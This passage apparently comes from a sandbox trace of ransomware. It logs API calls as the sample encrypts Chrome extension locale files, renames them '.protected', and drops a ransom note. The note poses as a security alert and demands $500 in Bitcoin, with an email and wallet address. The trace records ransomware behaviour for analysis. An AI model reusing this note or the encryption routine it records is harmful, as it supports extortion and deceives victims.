pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0080.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.122] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.122] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.123] lstrlenA (lpString="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") returned 684 [0080.123] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.123] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.123] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.123] CloseHandle (hObject=0x164) returned 1 [0080.124] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl") returned 141 [0080.124] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0080.124] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*") returned 143 [0080.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\.") returned 143 [0080.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.124] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\..") returned 144 [0080.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.124] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") 
returned 155 [0080.124] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.124] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.125] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.125] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.125] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.125] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.126] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.126] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.126] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.126] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.126] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.126] CloseHandle (hObject=0x168) returned 1 [0080.126] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.protected") returned 165 [0080.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.protected")) returned 1 [0080.127] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.127] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.127] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0080.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.127] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.128] lstrlenA (lpString="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") returned 684 [0080.128] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.128] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.128] CloseHandle (hObject=0x164) returned 1 [0080.129] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.129] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0080.129] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0080.129] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0080.129] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0080.129] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0080.129] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no") returned 141 [0080.129] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0080.129] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0080.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*") returned 143 [0080.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\.") returned 143 [0080.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.129] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\..") returned 144 [0080.130] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.130] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.130] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") 
returned 155 [0080.130] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.130] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.131] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.131] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.131] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.131] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbf, lpOverlapped=0x0) returned 1 [0080.132] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.132] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbf, lpOverlapped=0x0) returned 1 [0080.132] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.132] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.132] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.133] CloseHandle (hObject=0x168) returned 1 [0080.133] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.protected") returned 165 [0080.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.protected")) returned 1 [0080.133] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.133] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.134] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0080.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.134] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.135] lstrlenA (lpString="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") returned 684 [0080.135] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.135] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.135] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 